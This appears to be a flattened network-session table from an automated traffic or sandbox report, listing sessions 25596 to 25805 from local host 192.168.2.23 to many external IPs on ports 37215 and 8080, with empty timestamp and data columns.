                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25596192.168.2.234504851.227.3.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25597192.168.2.2349994157.220.119.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25598192.168.2.233723682.184.55.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25599192.168.2.2342020197.218.10.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25600192.168.2.234156441.111.103.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25601192.168.2.2342016197.236.147.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25602192.168.2.2339516157.84.180.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25603192.168.2.2339416152.174.194.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25604192.168.2.2359808136.103.153.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25605192.168.2.2348234109.34.74.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25606192.168.2.235331277.241.12.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25607192.168.2.2334718147.174.220.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25608192.168.2.235431447.39.148.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25609192.168.2.233697070.50.92.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25610192.168.2.235474419.6.112.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25611192.168.2.2351448198.245.197.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25612192.168.2.235298686.117.164.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25613192.168.2.235969695.236.30.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25614192.168.2.235045835.111.16.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25615192.168.2.234308068.115.129.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25616192.168.2.2344608146.104.184.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25617192.168.2.235013612.223.60.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25618192.168.2.2349024197.224.157.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25619192.168.2.2339908197.149.204.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25620192.168.2.2349856103.254.136.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25621192.168.2.234380290.202.140.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25622192.168.2.235364649.221.137.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25623192.168.2.235957072.67.202.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25624192.168.2.2347930205.237.8.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25625192.168.2.2344346143.160.207.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25626192.168.2.2343760172.82.176.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25627192.168.2.2360750107.160.112.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25628192.168.2.2338602115.82.55.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25629192.168.2.2332784125.190.163.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25630192.168.2.2339042184.246.150.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25631192.168.2.2346050137.25.224.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25632192.168.2.2358634155.69.38.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25633192.168.2.234007853.164.18.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25634192.168.2.2359366202.173.28.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25635192.168.2.2350602177.246.177.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25636192.168.2.234956813.232.134.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25637192.168.2.2359350187.42.240.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25638192.168.2.2337926159.231.45.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25639192.168.2.233635823.178.189.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25640192.168.2.2354644148.194.169.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25641192.168.2.235806825.108.193.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25642192.168.2.2349672190.55.180.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25643192.168.2.2351176191.224.146.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25644192.168.2.2338822211.175.198.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25645192.168.2.235914667.138.34.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25646192.168.2.2350768120.186.190.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25647192.168.2.233993891.6.10.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25648192.168.2.234374036.121.51.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25649192.168.2.2339946187.252.192.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25650192.168.2.2341824207.40.93.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25651192.168.2.2357896177.108.61.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25652192.168.2.2352386181.105.49.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25653192.168.2.234688457.235.11.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25654192.168.2.2346276158.23.23.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25655192.168.2.2352452211.116.189.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25656192.168.2.2340832217.75.113.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25657192.168.2.233968038.99.135.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25658192.168.2.2348674184.151.250.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25659192.168.2.23561644.145.12.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25660192.168.2.234390444.93.0.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25661192.168.2.2353784175.193.205.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25662192.168.2.234742868.44.240.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25663192.168.2.2352280223.15.44.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25664192.168.2.235684691.83.74.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25665192.168.2.235531477.29.59.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25666192.168.2.234157443.28.178.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25667192.168.2.233929858.246.209.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25668192.168.2.2338338149.64.130.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25669192.168.2.2358658146.190.239.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25670192.168.2.2342568145.169.113.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25671192.168.2.2348916122.167.172.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25672192.168.2.2345878195.1.159.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25673192.168.2.2348444142.104.167.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25674192.168.2.233742069.108.24.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25675192.168.2.2335104206.180.93.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25676192.168.2.235172644.96.119.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25677192.168.2.235495084.56.190.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25678192.168.2.2350102182.250.115.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25679192.168.2.234336635.19.65.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25680192.168.2.2357330139.128.223.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25681192.168.2.2357256130.255.92.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25682192.168.2.2358562149.39.36.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25683192.168.2.2344706161.187.238.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25684192.168.2.2354258199.99.132.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25685192.168.2.2353054221.120.209.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25686192.168.2.2353688178.225.232.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25687192.168.2.233806699.194.206.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25688192.168.2.235881280.122.110.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25689192.168.2.2345822140.102.227.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25690192.168.2.235364096.41.179.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25691192.168.2.2350664175.83.161.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25692192.168.2.2341958114.207.88.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25693192.168.2.233991442.8.5.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25694192.168.2.235307624.13.78.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25695192.168.2.2337592133.84.109.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25696192.168.2.235625025.77.30.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25697192.168.2.2349282142.72.94.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25698192.168.2.2336278207.84.126.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25699192.168.2.2347338132.207.85.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25700192.168.2.2334014199.240.20.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25701192.168.2.2350942147.180.104.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25702192.168.2.2345416161.212.142.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25703192.168.2.2333134126.77.148.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25704192.168.2.233986024.249.171.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25705192.168.2.2334236140.150.96.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25706192.168.2.2354564209.184.88.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25707192.168.2.2346356221.62.73.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25708192.168.2.2340720161.50.193.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25709192.168.2.2356258113.121.242.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25710192.168.2.2336290114.42.24.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25711192.168.2.23491904.5.45.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25712192.168.2.2357146158.109.206.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25713192.168.2.2337632190.65.76.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25714192.168.2.2355894100.185.174.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25715192.168.2.233483068.210.88.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25716192.168.2.236074027.194.207.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25717192.168.2.234694054.61.171.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25718192.168.2.2347260205.217.143.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25719192.168.2.2336430185.20.74.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25720192.168.2.235863683.5.159.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25721192.168.2.234977898.240.191.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25722192.168.2.234228090.108.140.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25723192.168.2.2358558210.196.143.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25724192.168.2.23410548.114.230.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25725192.168.2.2343288217.180.187.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25726192.168.2.2337884176.249.8.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25727192.168.2.2348820162.60.164.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25728192.168.2.2357996131.128.93.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25729192.168.2.2360758216.80.81.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25730192.168.2.23383449.38.240.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25731192.168.2.234013438.240.252.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25732192.168.2.2348650202.87.214.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25733192.168.2.2335374173.1.215.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25734192.168.2.235573062.144.23.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25735192.168.2.234326284.205.227.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25736192.168.2.234776018.130.220.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25737192.168.2.233994293.92.42.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25738192.168.2.2358528137.23.5.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25739192.168.2.235563485.116.21.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25740192.168.2.233649623.182.234.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25741192.168.2.2360922128.15.208.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25742192.168.2.234000463.164.21.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25743192.168.2.235825094.177.114.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25744192.168.2.2359426187.176.104.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25745192.168.2.2359628105.11.181.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25746192.168.2.234649876.201.143.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25747192.168.2.2353394110.38.114.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25748192.168.2.2350496144.120.29.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25749192.168.2.23366848.125.188.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25750192.168.2.2345592177.118.60.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25751192.168.2.234097098.4.51.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25752192.168.2.233913498.50.101.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25753192.168.2.2358190165.75.34.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25754192.168.2.2343334120.140.133.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25755192.168.2.2347158223.90.45.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25756192.168.2.2346212125.85.121.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25757192.168.2.234712414.106.201.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25758192.168.2.2357048138.17.199.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25759192.168.2.234569252.15.155.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25760192.168.2.2359538171.131.86.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25761192.168.2.234305847.72.181.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25762192.168.2.233902695.202.61.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25763192.168.2.235116618.164.87.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25764192.168.2.2360762202.205.137.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25765192.168.2.235291889.217.16.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25766192.168.2.234878239.62.28.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25767192.168.2.2357304179.221.17.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25768192.168.2.235032013.9.145.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25769192.168.2.2350152183.174.172.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25770192.168.2.234142694.67.130.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25771192.168.2.2348268115.169.207.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25772192.168.2.2350540131.19.247.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25773192.168.2.235421063.18.5.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25774192.168.2.2356484184.183.232.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25775192.168.2.2360748144.33.49.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25776192.168.2.235198885.247.56.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25777192.168.2.2352532192.215.65.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25778192.168.2.2347726185.50.216.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25779192.168.2.23569848.221.9.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25780192.168.2.2353068106.28.209.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25781192.168.2.234645075.33.240.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25782192.168.2.2353502197.171.186.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25783192.168.2.2337178195.91.175.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25784192.168.2.234071025.164.41.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25785192.168.2.233888075.79.243.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25786192.168.2.2344458115.151.142.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25787192.168.2.234468484.197.120.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25788192.168.2.2352988152.24.173.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25789192.168.2.234950263.38.110.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25790192.168.2.234635688.29.190.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25791192.168.2.235421635.97.129.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25792192.168.2.23453009.104.223.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25793192.168.2.2357070130.253.111.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25794192.168.2.235216065.216.8.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25795192.168.2.2359140193.65.254.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25796192.168.2.2348902129.73.21.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25797192.168.2.2354802187.192.79.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25798192.168.2.2356524198.150.181.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25799192.168.2.2346126187.194.213.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25800192.168.2.233415095.238.70.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25801192.168.2.234569462.149.255.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25802192.168.2.235361895.140.139.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25803192.168.2.234389423.44.184.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25804192.168.2.234246693.228.245.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25805192.168.2.2340188208.208.147.2138080
                                                        TimestampBytes transferredDirectionData


